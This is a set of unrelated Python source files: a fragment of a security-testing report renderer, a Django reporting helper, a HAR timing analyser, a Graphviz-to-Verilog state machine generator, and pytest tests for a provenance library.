TabData.append([ResourceListName, TabID]) Resources.append([TabID, ResourceList]) return self.Loader.load("tabbed_resource_link_list.html").generate(TabData=TabData, Resources=Resources) def ListPostProcessing(self, ResourceListName, link_list, HTMLlink_list): return self.Loader.load("list_post_processing.html").generate(ResourceListName=ResourceListName, link_list=link_list, HTMLlink_list=HTMLlink_list) def Requestlink_list(self, ResourceListName, link_list): return self.Loader.load("request_link_list.html").generate(ResourceListName=ResourceListName, link_list=link_list) def VulnerabilitySearchBox(self, SearchStr): """ Draws an HTML Search box for defined Vuln Search resources """ VulnSearchResources = self.resource.get_resources('VulnSearch') return self.Loader.load("vulnerability_search_box.html").generate(SearchStr=SearchStr, VulnSearchResources=VulnSearchResources) def SuggestedCommandBox(self, PluginOutputDir, CommandCategoryList, Header=''): """ Draws HTML tabs for a list of TabName => Resource Group (i.e. how to run hydra, etc) """ TitleList = [] CommandList = [] for item in CommandCategoryList: TitleList.append(item[0]) CommandList.append(self.resource.get_resources(item[1])) # TODO: Fix up the plugin return self.Loader.load("suggested_command_box.html").generate(Header=Header, TitleList=TitleList, CommandList=CommandList) def CommandDump(self, Name, CommandIntro, ModifiedCommand, RelativeFilePath, OutputIntro, TimeStr): AbsPath = self.plugin_handler.get_abs_path(RelativeFilePath) OutputLines = open(AbsPath, "r").readlines() longOutput = (len(OutputLines) > self.mNumLinesToShow) if (len(OutputLines) > self.mNumLinesToShow): OutputLines = ''.join(OutputLines[0:self.mNumLinesToShow]) else: OutputLines = ''.join(OutputLines) table_vars = { "Name": Name, "CommandIntro": CommandIntro, "ModifiedCommand": ModifiedCommand, "FilePath": RelativeFilePath, "OutputIntro": OutputIntro, "OutputLines": OutputLines, "TimeStr": TimeStr, "mNumLinesToShow": self.mNumLinesToShow, "longOutput": longOutput } return self.Loader.load("command_dump.html").generate(**table_vars) def URLsFromStr(self, TimeStr, VisitURLs, URLList, NumFound): html_content = self.Loader.load("urls_from_str.html").generate(TimeStr=TimeStr, VisitURLs=VisitURLs, NumURLs=len(URLList), NumFound=NumFound) if URLList: html_content += self.link_list("URLs Scraped", URLList) return html_content def Robots(self, NotStr, NumLines, NumAllow, NumDisallow, NumSitemap, SavePath, EntriesList, NumAddedURLs): vars = { "robots_found": NotStr, "num_lines": NumLines, "num_allow": NumAllow, "num_disallow": NumDisallow, "num_sitemap": NumSitemap, "save_path": SavePath } TestResult = self.Loader.load("robots.html").generate(**vars) # robots.txt contains some entries, show browsable list! :) if NumDisallow > 0 or NumAllow > 0 or NumSitemap > 0: for Display, Links in EntriesList: if Links: # Filters empty lists TestResult += self.resource_linklist(Display, Links) return TestResult def HtmlString(self, String): return String # ---------------------- Grep Plugin Outputs -------------------- # def ResponseBodyMatches(self, ResponseRegexpName): RegexpName, GrepOutputs, TransactionIDS, match_percent = self.transaction.search_by_regex_name(ResponseRegexpName, stats=True) variables = { "name": RegexpName.replace("RESPONSE_REGEXP_FOR_", "").replace('_', ' '), "matches": GrepOutputs, "transaction_ids": TransactionIDS, "match_percent": match_percent } return self.Loader.load("response_matches.html").generate(**variables) def ResponseHeaderMatches(self, HeaderRegexpName): return self.ResearchHeaders(HeaderRegexpName)[0] def ResearchHeaders(self, RegexName): regex_name, grep_outputs, transaction_ids, match_percent = self.transaction.search_by_regex_name(RegexName, stats=True) # [[unique_matches, matched_transactions, matched_percentage]] searches = self.Loader.load("header_searches.html").generate(match_percent=match_percent, matches=grep_outputs, transaction_ids=transaction_ids) return [searches, grep_outputs] def FingerprintData(self): HeaderTable, matches = self.ResearchHeaders('HEADERS_FOR_FINGERPRINT') for item in matches: # Add Vulnerability search boxes after table HeaderTable += self.VulnerabilitySearchBox(item[1]) return HeaderTable def TopTransactionsBySpeed(self, Order): transactions = self.transaction.get_top_by_speed(Order) return self.TransactionTableForTransactions(transactions) def CookieAttributeAnalysis(self, CookieValueList, Header2TransacDict): vars = { "Cookies": [{ "Name": Cookie.split('=')[0], "Link": Header2TransacDict[self.config.get('HEADERS_FOR_COOKIES').lower() + Cookie], "Attribs": Cookie.replace(Cookie.split('=')[0] + "=", "").replace("; ", ";").split(";"), } for Cookie in CookieValueList], } Table = self.Render.CreateTable({'class': 'report_intro'}) SetCookie = self.config.get('HEADERS_FOR_COOKIES').lower() PossibleCookieAttributes = self.config.get('COOKIE_ATTRIBUTES').split(',') for Cookie in CookieValueList: CookieName = Cookie.split('=')[0] CookieLink = self.Render.DrawButtonLink(cgi.escape(CookieName), Header2TransacDict[SetCookie + Cookie]) CookieAttribs = Cookie.replace(CookieName + "=", "").replace("; ", ";").split(";") Table.CreateCustomRow('<tr><th colspan="2">Cookie: %s</th></tr>' % CookieLink) Table.CreateRow(['Attribute', 'Value'], True) NotFoundStr = "<b>Not Found</b>" if CookieAttribs[0]: CookieValue = CookieAttribs[0] else: CookieValue = NotFoundStr Table.CreateRow(['Value', CookieValue]) for Attrib in PossibleCookieAttributes: DisplayAttribute = NotFoundStr for PresentAttrib in CookieAttribs: # Avoid false positives due to cookie contents if PresentAttrib.lower().startswith(Attrib.lower()): DisplayAttribute = PresentAttrib break Table.CreateRow([Attrib, DisplayAttribute]) if Table.GetNumRows() == 0: return "" # No Attributes found return "<h3>Cookie Attribute Analysis</h3>%s" % Table.Render() reporter = Reporter()
<gh_stars>0 # -*- coding: utf-8 -*- import calendar, logging, pprint from django.conf import settings as project_settings from django.core.cache import cache from django.core.urlresolvers import reverse from tech_services_reports.models import Accession, CatEdit log = logging.getLogger("webapp") class DateMaker(object): """ Prepares accession and catalog dates. """ def make_context( self, scheme, host ): """ Builds context for index view. Called by views.index() """ context = { 'STATIC_URL': project_settings.STATIC_URL, 'acc_months': self.get_acc_months( scheme, host ), 'acc_years': self.get_acc_years( scheme, host ), 'cat_months': self.get_cat_months( scheme, host ), 'cat_years': self.get_cat_years( scheme, host ), 'custom_report_url': reverse('custom_report_url') } context = self.add_admin_urls( context ) log.debug( 'context,```{}```'.format( pprint.pformat(context) ) ) return context def get_acc_months( self, scheme, host ): """ Returns accession monthly date info. Called by make_context() """ acc_months = cache.get( 'acc_months_cached' ) acc_month_lst = [] if acc_months is None: acc_months = Accession.objects.dates('created', 'month', order='DESC') # grabs list of accession date-objects, one-per-month cache.set( 'acc_months_cached', acc_months, 60*60*24 ) # 1 day for date_obj in acc_months: # link = '{sch}://{hst}{url}{yr}/{mo}/'.format( sch=scheme, hst=host, url=reverse('accessions'), yr=date_obj.year, mo=date_obj.month ) link = '{url}{yr}/{mo}/'.format( sch=scheme, hst=host, url=reverse('accessions'), yr=date_obj.year, mo=date_obj.month ) acc_month_lst.append( { 'month': date_obj.month, 'month_name': calendar.month_name[date_obj.month], 'year': date_obj.year, 'link': link } ) # log.debug( 'type(acc_months), `{typ}`; acc_months, ```{val}```'.format( typ=type(acc_months), val=acc_months) ) log.debug( 'acc_month_lst, ```{}```'.format(pprint.pformat(acc_month_lst)) ) return acc_month_lst def get_cat_months( self, scheme, host ): """ Returns catalog monthly date info. Called by make_context() """ cat_months = cache.get( 'cat_months_cached' ) cat_month_lst = [] if cat_months is None: cat_months = CatEdit.objects.dates('edit_date', 'month', order='DESC') # grabs list of cataloging date-objects, one-per-month cache.set( 'cat_months_cached', cat_months, 60*60*24 ) # 1 day for date_obj in cat_months: # link = '{sch}://{hst}{url}{yr}/{mo}/'.format( sch=scheme, hst=host, url=reverse('cataloging'), yr=date_obj.year, mo=date_obj.month ) link = '{url}{yr}/{mo}/'.format( sch=scheme, hst=host, url=reverse('cataloging'), yr=date_obj.year, mo=date_obj.month ) cat_month_lst.append( { 'month': date_obj.month, 'month_name': calendar.month_name[date_obj.month], 'year': date_obj.year, 'link': link } ) log.debug( 'cat_month_lst, ```{}```'.format(pprint.pformat(cat_month_lst)) ) return cat_month_lst def get_acc_years( self, scheme, host ): """ Returns accession year date info. Called by make_context() """ acc_years = cache.get( 'acc_years_cached' ) acc_years_lst = [] if acc_years is None: acc_years = Accession.objects.dates('created', 'year', order='DESC') # grabs list of accession date-objects, one-per-year cache.set( 'acc_years_cached', acc_years, 60*60*24 ) for date_obj in acc_years: # link = '{sch}://{hst}{url}{yr}/'.format( sch=scheme, hst=host, url=reverse('accessions'), yr=date_obj.year ) link = '{url}{yr}/'.format( sch=scheme, hst=host, url=reverse('accessions'), yr=date_obj.year ) acc_years_lst.append( {'year': date_obj.year, 'link': link} ) log.debug( 'acc_years_lst, ```{}```'.format(pprint.pformat(acc_years_lst)) ) return acc_years_lst def get_cat_years( self, scheme, host ): """ Returns catalog year dates. Called by views.index() """ cat_years = cache.get( 'cat_years_cached' ) cat_years_lst = [] if cat_years is None: cat_years = CatEdit.objects.dates('edit_date', 'year', order='DESC') # grabs list of cataloging date-objects, one-per-year cache.set( 'cat_years_cached', cat_years, 60*60*24 ) for date_obj in cat_years: # link = '{sch}://{hst}{url}{yr}/'.format( sch=scheme, hst=host, url=reverse('cataloging'), yr=date_obj.year ) link = '{url}{yr}/'.format( sch=scheme, hst=host, url=reverse('cataloging'), yr=date_obj.year ) cat_years_lst.append( {'year': date_obj.year, 'link': link} ) log.debug( 'cat_years_lst, ```{}```'.format(pprint.pformat(cat_years_lst)) ) return cat_years_lst def add_admin_urls( self, context ): """ Adds admin edit urls to context. Called by make_context() """ context['admin_edit_summary_accession_data_url'] = reverse('admin:tech_services_reports_summaryaccession_changelist') context['admin_edit_summary_cat_data_url'] = reverse('admin:tech_services_reports_summarycatedit_changelist') context['admin_edit_harvested_accession_data_url'] = reverse('admin:tech_services_reports_accession_changelist') context['admin_edit_harvested_cat_data_url'] = reverse('admin:tech_services_reports_catedit_changelist') return context ## end class DateMaker()
from har_models import har_data_from_dict, Entry from typing import Set, List, Tuple, Dict from datetime import datetime import json import logging import copy logging.basicConfig( level=logging.DEBUG, format="[%(asctime)s] %(levelname)-12s|process:%(process)-5s|thread:%(thread)-5s|funcName:%(funcName)s|message:%(message)s", handlers=[ # logging.FileHandler('fileName.log'), logging.StreamHandler() ]) STATIC_TYPES = ['javascript', 'woff', 'css', 'image', 'video', 'audio'] MILLISEC_IN_MUNUTE = 60000 def get_mime_types(entries: List[Entry]) -> Set[str]: all_mime_types = [] for entry in entries: all_mime_types.append(entry.response.content.mime_type) logging.debug(f'all_mime_types {type(all_mime_types)} = {all_mime_types}') return set(all_mime_types) def get_type_lists(mime_types: List[str]) -> List[str]: static_types = [] for mime_type in mime_types: is_static = False for stype in STATIC_TYPES: if stype in mime_type: is_static = True break logging.debug(f'mime_type {type(mime_type)} = {mime_type}') logging.debug(f'is_static {type(is_static)} = {is_static}') if is_static: static_types.append(mime_type) return static_types def grouping_by_comment(entries: List[Entry], static_mime_types: List[str]): comments = {} group_number = 1 for entry in entries: current_comment = entry.comment if current_comment == '': current_comment = 'non-comment' if current_comment not in comments: comments[current_comment] = group_number group_number += 1 logging.debug(f'comments {type(comments)} = {comments}') grouped_entries = {} grouped_entries['entries'] = {} grouped_entries['comments'] = comments for comment in comments: grouped_entries['entries'][comment] = {'static': [], 'non-static': []} grouped_entries['entries'][comment]['group_number'] = comments[comment] for entry in entries: current_comment = entry.comment if current_comment == '': current_comment = 'non-comment' if entry.response.content.mime_type in static_mime_types: grouped_entries['entries'][current_comment]['static'].append(entry) else: grouped_entries['entries'][current_comment]['non-static'].append( entry) return grouped_entries def set_types(entries, mime_types, static_mime_types): entries['mime_types'] = mime_types entries['static_mime_types'] = static_mime_types return entries def count_requests(entries_data): for entry_group_name in entries_data['entries']: entries_data['entries'][entry_group_name]['group_static_requests_count'] = len( entries_data['entries'][entry_group_name]['static']) entries_data['entries'][entry_group_name]['group_non_static_requests_count'] = len( entries_data['entries'][entry_group_name]['non-static']) entries_data['entries'][entry_group_name]['group_full_requests_count'] = len( entries_data['entries'][entry_group_name]['static']) + len( entries_data['entries'][entry_group_name]['non-static']) summary_static_requests_count = 0 summary_non_static_requests_count = 0 summary_full_requests_count = 0 for entry_group_name in entries_data['entries']: summary_static_requests_count += entries_data['entries'][entry_group_name]['group_static_requests_count'] summary_non_static_requests_count += entries_data['entries'][entry_group_name]['group_non_static_requests_count'] summary_full_requests_count += entries_data['entries'][entry_group_name]['group_full_requests_count'] entries_data['summary_static_requests_count'] = summary_static_requests_count entries_data['summary_non_static_requests_count'] = summary_non_static_requests_count entries_data['summary_full_requests_count'] = summary_full_requests_count return entries_data def set_times_in_entries(entries_data): for entry_group_name in entries_data['entries']: group_start_epoch = 0 group_end_epoch = 0 group_static_time_millisec = 0 for entry in entries_data['entries'][entry_group_name]['static']: current_entry: Entry = entry if group_start_epoch == 0: group_start_epoch = current_entry.started_date_time.timestamp() if group_end_epoch == 0: group_end_epoch = current_entry.started_date_time.timestamp() if current_entry.started_date_time.timestamp() < group_start_epoch: group_start_epoch = current_entry.started_date_time.timestamp() if current_entry.started_date_time.timestamp() > group_end_epoch: group_end_epoch = current_entry.started_date_time.timestamp() group_static_time_millisec += current_entry.time group_non_static_time_millisec = 0 for entry in entries_data['entries'][entry_group_name]['non-static']: current_entry: Entry = entry if group_start_epoch == 0: group_start_epoch = current_entry.started_date_time.timestamp() if group_end_epoch == 0: group_end_epoch = current_entry.started_date_time.timestamp() if current_entry.started_date_time.timestamp() < group_start_epoch: group_start_epoch = current_entry.started_date_time.timestamp() if current_entry.started_date_time.timestamp() > group_end_epoch: group_end_epoch = current_entry.started_date_time.timestamp() group_non_static_time_millisec += current_entry.time group_total_time_millisec = group_static_time_millisec + \ group_non_static_time_millisec entries_data['entries'][entry_group_name]['group_total_time_millisec'] = group_total_time_millisec entries_data['entries'][entry_group_name]['group_static_time_millisec'] = group_static_time_millisec entries_data['entries'][entry_group_name]['group_non_static_time_millisec'] = group_non_static_time_millisec entries_data['entries'][entry_group_name]['group_start_datetime'] = group_start_epoch entries_data['entries'][entry_group_name]['group_end_datetime'] = group_end_epoch entries_data['entries'][entry_group_name]['group_time_difference_millisec'] = ( group_end_epoch - group_start_epoch) * 1000 group_think_time_millisec = entries_data['entries'][entry_group_name]['group_time_difference_millisec'] - \ entries_data['entries'][entry_group_name]['group_total_time_millisec'] if group_think_time_millisec > 0: entries_data['entries'][entry_group_name]['group_think_time_millisec'] = group_think_time_millisec else: entries_data['entries'][entry_group_name]['group_think_time_millisec'] = 0 total_time_millisec = 0 static_time_millisec = 0 non_static_time_millisec = 0 total_time_with_think_time = 0 for entry_group_name in entries_data['entries']: total_time_millisec += entries_data['entries'][entry_group_name]['group_total_time_millisec'] static_time_millisec += entries_data['entries'][entry_group_name]['group_static_time_millisec'] non_static_time_millisec += entries_data['entries'][entry_group_name]['group_non_static_time_millisec'] total_time_with_think_time += entries_data['entries'][entry_group_name]['group_total_time_millisec'] total_time_with_think_time += entries_data['entries'][entry_group_name]['group_think_time_millisec'] entries_data['total_time_millisec'] = total_time_millisec entries_data['static_time_millisec'] = static_time_millisec entries_data['non_static_time_millisec'] = non_static_time_millisec entries_data['total_time_with_think_time'] = total_time_with_think_time entries_data['minutes_on_one_iteration_with_think_time'] = entries_data['total_time_with_think_time'] / MILLISEC_IN_MUNUTE entries_data['throughput_in_minute_with_think_time'] = MILLISEC_IN_MUNUTE / \ entries_data['total_time_with_think_time'] entries_data['minutes_on_one_iteration_with_out_think_time'] = entries_data['total_time_millisec'] / \ MILLISEC_IN_MUNUTE entries_data['throughput_in_minute_with_out_think_time'] = MILLISEC_IN_MUNUTE / \ entries_data['total_time_millisec'] entries_data['minutes_on_one_iteration_non_static'] = entries_data['non_static_time_millisec'] / MILLISEC_IN_MUNUTE entries_data['throughput_in_minute_non_static'] = MILLISEC_IN_MUNUTE / \ entries_data['non_static_time_millisec'] return entries_data def write_entries_data(entries_data: dict, filename: str): with open(f'{filename}-groups-summary.csv', mode='w', encoding='UTF-8') as file: file.write(f'group_number,entry_group_name,group_total_time_millisec,group_static_time_millisec,group_non_static_time_millisec,group_start_datetime,group_end_datetime,group_time_difference_millisec,group_think_time,static_requests_count,summary_non_static_requests_count,summary_full_requests_count\n') file.write( f"0,summary,{entries_data['total_time_millisec']},{entries_data['static_time_millisec']},{entries_data['non_static_time_millisec']},0,0,0,{entries_data['total_time_with_think_time']},{entries_data['summary_static_requests_count']},{entries_data['summary_non_static_requests_count']},{entries_data['summary_full_requests_count']}\n") for entry_group_name in entries_data['entries']: group_number = entries_data['entries'][entry_group_name]['group_number'] group_total_time_millisec = entries_data['entries'][entry_group_name]['group_total_time_millisec'] group_static_time_millisec = entries_data['entries'][entry_group_name]['group_static_time_millisec'] group_non_static_time_millisec = entries_data['entries'][ entry_group_name]['group_non_static_time_millisec'] group_start_datetime = entries_data['entries'][entry_group_name]['group_start_datetime'] group_end_datetime = entries_data['entries'][entry_group_name]['group_end_datetime'] group_time_difference_millisec = entries_data['entries'][ entry_group_name]['group_time_difference_millisec'] group_think_time = entries_data['entries'][entry_group_name]['group_think_time_millisec'] group_static_requests_count = entries_data['entries'][entry_group_name]['group_static_requests_count'] group_non_static_requests_count = entries_data['entries'][entry_group_name]['group_non_static_requests_count'] group_full_requests_count = entries_data['entries'][entry_group_name]['group_full_requests_count'] file.write(f'{group_number},{entry_group_name},{group_total_time_millisec},{group_static_time_millisec},{group_non_static_time_millisec},{group_start_datetime},{group_end_datetime},{group_time_difference_millisec},{group_think_time},{group_static_requests_count},{group_non_static_requests_count},{group_full_requests_count}\n') with open(f'{filename}-results.json', mode='w', encoding='UTF-8') as file: entries_copy = copy.deepcopy(entries_data) del entries_copy['comments'] del entries_copy['entries'] del entries_copy['mime_types'] json_data = json.dumps(entries_copy) file.write(json_data) def main(): filename = 'test5.har' with open(filename, encoding='utf-8-sig', errors='ignore') as file: json_data = json.load(file, strict=False) har_data = har_data_from_dict(json_data) entries = har_data.log.entries mime_types = get_mime_types(entries) static_mime_types = get_type_lists(mime_types) entries_by_comment = grouping_by_comment(entries, static_mime_types) entries_data = set_types( entries_by_comment, mime_types, static_mime_types) entries_data = count_requests(entries_data) entries_data = set_times_in_entries(entries_data) write_entries_data(entries_data, filename) if __name__ == "__main__": main()
import sys import os import re import time import logging import string from NullHandler import NullHandler import help from vlogTemplate import vlogTemplate from incTemplate import incTemplate """ Reads in a Graphviz .dot file and generates a Verilog state machine based on some simple rules. 1) Only one state transitions per line: state_name -> next_state_name; next_state_name -> next_next_state_name; not state_name -> next_state_name -> next_next_state_name; 2) Events that cause state transitions are called "affectors" and are defined by .dot labels: state_name -> next_state_name [label = "start"]; These events will generate input ports of the same name as the label. """ class StateTransition(): def __init__(self, state): self.state = state self.transitions = [] self.default = None def str(self): return self.state class FSMGen(): def __init__(self): self.__title = "" self.__unique_states = [] self.__num_states = 0 self.__states = {} self.__transitions = [] self.__unique_affectors = [] self.__default_state = None self.__dotfile = None self.logger = logging.getLogger("FSMGen") h = NullHandler() logging.getLogger("FSMGen").addHandler(h) self.subs = { 'website': "https://github.com/inneralien/Tizzy", 'dot_filename': "", 'filename': "", 'creation_date': "", 'title': "", 'module_name': "", 'inputs': "", 'msb': "", 'lsb': "", 'state_params': "", 'range': "", 'next_state_logic': "", 'state_generator': "", 'state_debug': "", } self.longest_state_str = 0 def getUniqueStates(self): return self.__unique_states def checkForDefaultState(self): """ If the transition has an affector, check to see if there is also a same state transition with no affector. """ self.logger.info("Checking for explicit same-state transitions") affector_states = [] for state in self.__unique_states: for trans in self.__states[state].transitions: if(trans[1] is None): self.logger.debug("Has same state trans: %s" % (state)) has_same_state_trans = True break else: has_same_state_trans = False if(has_same_state_trans is False): affector_states.append(state) if(len(affector_states) > 0): raise MissingTransitionsError("addSameStateTransition", "Some states may not have all transitions covered", help.missing_transition_help, affector_states) def checkForDuplicateTransitions(self): """ Takes a list of StateTransition objects and checks to see if there are any duplicate affectors that cause transitions from the same current state. i.e. IDLE -> P1 [label='run']; IDLE -> P2 [label='run']; """ self.logger.info("Checking for duplicate state transitions") state_trans = [] for t in self.__transitions: # Make a string of the three values if(t.affector is not None): val = t.state + t.state_next + t.affector else: val = t.state + t.state_next if(val in state_trans): raise DuplicateTransitionError("checkForDuplicateTransitions", "A duplicate state transition was found\n %s -> %s" % (t.state, t.state_next), None) else: state_trans.append(val) for i in state_trans: if(state_trans.count(i) > 1): print "More than once: %s" % i if(False): raise FSMError("Duplicate Affectors", "Attempting multiple state transitions with the same affector") def parseDotFile(self, filename): """ The parser is looking for 3 things: 1) FSM label label = "My Fancy State Machine" 2) State transitions IDLE -> PIPE1; 3) Explicit affectors which cause the state change IDLE -> PIPE1 [label = "rdy"]; Checks: 1) Same affector used to transition to multiple next states from the current state. i.e. IDLE -> P1 [label='run']; IDLE -> P2 [label='run']; 2) No explicit same-state transition: IDLE -> P1 [label='run']; but missing: IDLE -> IDLE; The same-state transition will be created automatically. """ re_fsm_name = re.compile(r'^\s*digraph\s*(\w+)') re_fsm_label = re.compile(r'^\s*label\s*=\s*\"(.*)\"') re_states = re.compile(r'^\s*(\w+)\s*->\s*(\w+)') re_affectors = re.compile(r'\[\s*label\s*=\s*\"(.*)\"\s*\]') self.subs['dot_filename'] = filename f = open(filename, 'r') self.__dotfile = f.read() f.close() file = self.__dotfile.split('\n') for line in file: st = None ## Find FSM Module Name m = re_fsm_name.search(line) if(m is not None): self.__name = m.group(1) self.logger.info("Found Module Name: %s" % self.__name) ## Find FSM Title m = re_fsm_label.search(line) if(m is not None): self.__title = m.group(1) self.logger.info("Found Title: %s" % self.__title) ## Find States and Next States m_state = re_states.search(line) if(m_state is not None): state = m_state.group(1) if state not in self.__unique_states: self.__unique_states.append(state) self.logger.debug("Adding state: %s" % state) self.__states[state] = StateTransition(state) if(len(state) > self.longest_state_str): self.longest_state_str = len(state) ## Find Transitions m_affector = re_affectors.search(line) if(m_affector is not None): affector = m_affector.group(1) ## Strip off ~ and ! etc. affector_stripped = re.sub('[~|!()&^]','',affector).split() self.logger.debug("Stripped affectors: '%s'" % affector_stripped) for i in affector_stripped: if(i not in self.__unique_affectors): self.logger.debug("Adding unique affector: '%s'" % i) self.__unique_affectors.append(i) else: affector = None next_state = m_state.group(2) self.logger.debug("Adding transition: %s -> %s (%s)" % (state, next_state, affector)) trans = (next_state, affector) if(trans in self.__states[state].transitions): raise DuplicateTransitionError("checkForDuplicateTransitions", "A duplicate state transition was found\n %s -> %s" % (state, next_state), None) else: self.__states[state].transitions.append((next_state, affector)) self.__default_state = self.__unique_states[0] self.__num_states = len(self.__unique_states) self.logger.debug("State Transitions:") for state in self.__unique_states: for trans in self.__states[state].transitions: self.logger.debug(" %s -> %s %s" % (state, trans[0], trans[1])) def getInputPorts(self): """ Creates and returns a string of input ports. """ pass def getOutputPorts(self): """ Creates and returns a string of output ports. """ pass def genNextStateLogicString(self): """ Returns a string that represents the next state generator Verilog code. """ str = "" ## The first state is the default state for state in self.__unique_states: final_trans = None first_trans = None other_trans = [] str += " state[%s] :\n" % state num_trans = len(self.__states[state].transitions) for i in range(num_trans): remaining = num_trans - i trans = self.__states[state].transitions[i] self.logger.debug(remaining) if(trans[1] is None): if(final_trans is None): self.logger.debug("Final trans: %r %r" % (trans[0], trans[1])) final_trans = trans else: raise MultipleDefaultTransitionsError('genNextStateLogicString', None, None) else: if(first_trans is None): self.logger.debug("First trans: %r %r" % (trans[0], trans[1])) first_trans = trans else: self.logger.debug("Other trans: %r %r" % (trans[0], trans[1])) other_trans.append(trans) if(first_trans is not None): str += " if(%s)\n" % first_trans[1] str += " state_next[%s] = 1'b1;\n" % first_trans[0] if(other_trans is not None): for trans in other_trans: str += " else if(%s)\n" % trans[1] str += " state_next[%s] = 1'b1;\n" % trans[0] if(final_trans is not None): if(num_trans != 1): str += " else\n" str += " state_next[%s] = 1'b1;\n" % final_trans[0] str += " default:\n" str += " state_next[%s] = 1'b1;" % self.__default_state return str def genStateGeneratorString(self): """ Returns a string that represents the state generator Verilog code. """ str = "" str += " state <= `D %d'b0;\n" % self.__num_states str += " state[%s] <= `D 1'b1;" % self.__default_state return str def genStateDebugString(self): """ Returns a string the represents some state debug Verilog code. """ # longest = 0 # for state in self.__unique_states: # str_len = len(state) # if(str_len > longest): # longest = str_len str = "" str += "// synthesis translate_off\n" str += "// State names for simulation\n" str += "reg [79:0] state_string;\n" str += "always @(*)\n" str += " case(1'b1)\n" for state in self.__unique_states: state_str = "state[%s]" % state str += ' %s : state_string = "%s";\n' % \ (state_str.ljust(8+self.longest_state_str), state) str += " endcase\n" str += "// synthesis translate_on\n" return str def fillStringSubs(self): # self.subs['creation_date'] = time.strftime("%b %d %Y") self.subs['creation_date'] = time.strftime("%d-%b-%Y") self.subs['title'] = self.__title self.subs['module_name'] = self.__name for i in self.__unique_affectors: self.subs['inputs'] += " input wire %s,\n" % i self.subs['msb'] = self.__num_states-1 self.subs['lsb'] = 0 for i in range(self.__num_states): str = " %s = %d" % \ (self.__unique_states[i].ljust(self.longest_state_str), i) if(i < self.__num_states-1): str += ",\n" else: str += ";" self.subs['state_params'] += str self.subs['range'] = self.__num_states self.subs['next_state_logic'] = self.genNextStateLogicString() self.subs['state_generator'] = self.genStateGeneratorString() self.subs['digraph'] = self.__dotfile self.subs['state_debug'] = self.genStateDebugString() def writeVerilog(self, version, filename=None, include_file=None): """ Writes the verilog using a string template. If filename is None then stdout is used. """ # Verilog Filename self.subs['version'] = version if(filename is None): self.subs['filename'] = "STDIO" else: self.subs['filename'] = filename # Include Filename if(include_file is None): include_file = "states.vh" (head, tail) = os.path.split(include_file) self.subs['include_file'] = tail s = string.Template(vlogTemplate) self.fillStringSubs() if(filename is None): sys.stdout.write(s.safe_substitute(self.subs)) else: f = open(self.subs['filename'], 'w') f.write(s.safe_substitute(self.subs)) f.close() self.writeIncludeFile(version, include_file) def writeIncludeFile(self, version, filename=None): """ Writes an include file that contains the state parameters. """ sys.stderr.write("Writing include file: %s\n" % filename) s = string.Template(incTemplate) f = open(filename, 'w') f.write(s.safe_substitute(self.subs)) f.close() class FSMError(Exception): def __init__(self, method_name, error_message, long_message): Exception.__init__(self) self.method_name = method_name self.error_message = error_message self.long_message = long_message class MissingTransitionsError(FSMError): def __init__(self, method_name, error_message, long_message, states): FSMError.__init__(self, method_name, error_message, long_message) self.states = states class DuplicateTransitionError(FSMError): def __init__(self, method_name, error_message, long_message): FSMError.__init__(self, method_name, error_message, long_message) class MultipleDefaultTransitionsError(FSMError): def __init__(self, method_name, error_message, long_message): FSMError.__init__(self, method_name, error_message, long_message)
<gh_stars>0 from datetime import datetime import copy import pandas as pd import pytest import sqlalchemy_utils.functions as sql_utils import provenance as p import provenance._commonstore as cs import provenance.blobstores as bs import provenance.repos as r from conftest import artifact_record def test_inputs_json(db_session): repo = r.DbRepo(db_session, bs.MemoryStore()) @p.provenance(version=0, name='initial_data', repo=repo) def load_data(filename, timestamp): return {'data': [1, 2, 3], 'timestamp': timestamp} @p.provenance(repo=repo) def process_data_X(data, process_x_inc, timestamp): _data = [i + process_x_inc for i in data['data']] return {'data': _data, 'timestamp': timestamp} @p.provenance(repo=repo) def process_data_Y(data, process_y_inc, timestamp): _data = [i + process_y_inc for i in data['data']] return {'data': _data, 'timestamp': timestamp} @p.provenance(repo=repo) def combine_processed_data(filename, inc_x, inc_y, timestamp): _data = [a + b for a, b in zip(inc_x['data'], inc_y['data'])] return {'data': _data, 'timestamp': timestamp} def pipeline(filename, timestamp, process_x_inc, process_y_inc): data = load_data(filename, timestamp) inc_x = process_data_X(data, process_x_inc, timestamp) inc_y = process_data_Y(data, process_y_inc, timestamp) res = combine_processed_data(filename, inc_x, inc_y, timestamp) return {'data': data, 'inc_x': inc_x, 'inc_y': inc_y, 'res': res} now = datetime(2016, 9, 27, 7, 51, 11, 613544) expected_inputs_json = { "__varargs": [], "filename": "foo-bar", "timestamp": now, "inc_x": { "id": "c74da9d379234901fe7a89e03fa800b0", # md5 # "id": "2c33a362ebd51f830d0b245473ab6c1269674259", # sha1 "name": "test_repos.process_data_X", "type": "ArtifactProxy" }, "inc_y": { "id": "a1bd4d4ae1f33ae6379613618427f127", # md5 # "id": "f9b1bb7a8aaf435fbf60b92cd88bf6c46604f702", # sha1 "name": "test_repos.process_data_Y", "type": "ArtifactProxy" } } results = pipeline(filename='foo-bar', process_x_inc=5, process_y_inc=10, timestamp=now) res = results['res'].artifact inputs_json = r._inputs_json(res.inputs) assert inputs_json == expected_inputs_json results = pipeline(filename='foo-bar', process_x_inc=5, process_y_inc=10, timestamp=now) res = results['res'].artifact inputs_json = r._inputs_json(res.inputs) assert inputs_json == expected_inputs_json def test_basic_repo_ops(repo): artifact = artifact_record() assert artifact.id not in repo repo.put(artifact) assert artifact.id in repo assert artifact in repo with pytest.raises(cs.KeyExistsError) as e: repo.put(artifact) assert repo.get_by_id(artifact.id).id == artifact.id assert repo[artifact.id].id == artifact.id assert repo.get_by_value_id(artifact.value_id).id == artifact.id repo.delete(artifact.id) assert artifact.id not in repo if hasattr(repo, 'blobstore'): assert artifact.id not in repo.blobstore assert artifact.value_id not in repo.blobstore with pytest.raises(KeyError) as e: repo.delete(artifact.id) with pytest.raises(KeyError) as e: repo.get_by_id(artifact.id) with pytest.raises(KeyError) as e: repo.get_by_value_id(artifact.id) @pytest.mark.parametrize('artifact_class', [r.ArtifactProxy, r.CallableArtifactProxy]) @pytest.mark.parametrize('copy_method', [copy.copy, copy.deepcopy]) def test_copy_Proxies(repo, artifact_class, copy_method): class Artifact(): def __init__(self, id): self.id = id a = artifact_class({'a': 1, 'b': 2, 'c': 3}, Artifact('1')) b = copy_method(a) b['a'] = 10 assert a['a'] != b['a'] def test_repo_set_put_and_finding(repo): artifact = artifact_record(id='123') repo.put(artifact) artifact_set = r.ArtifactSet([artifact.id], 'foo') repo.put_set(artifact_set) assert repo.get_set_by_id(artifact_set.id) == artifact_set found_set = repo.get_set_by_labels('foo') assert found_set.name == 'foo' assert found_set.artifact_ids == 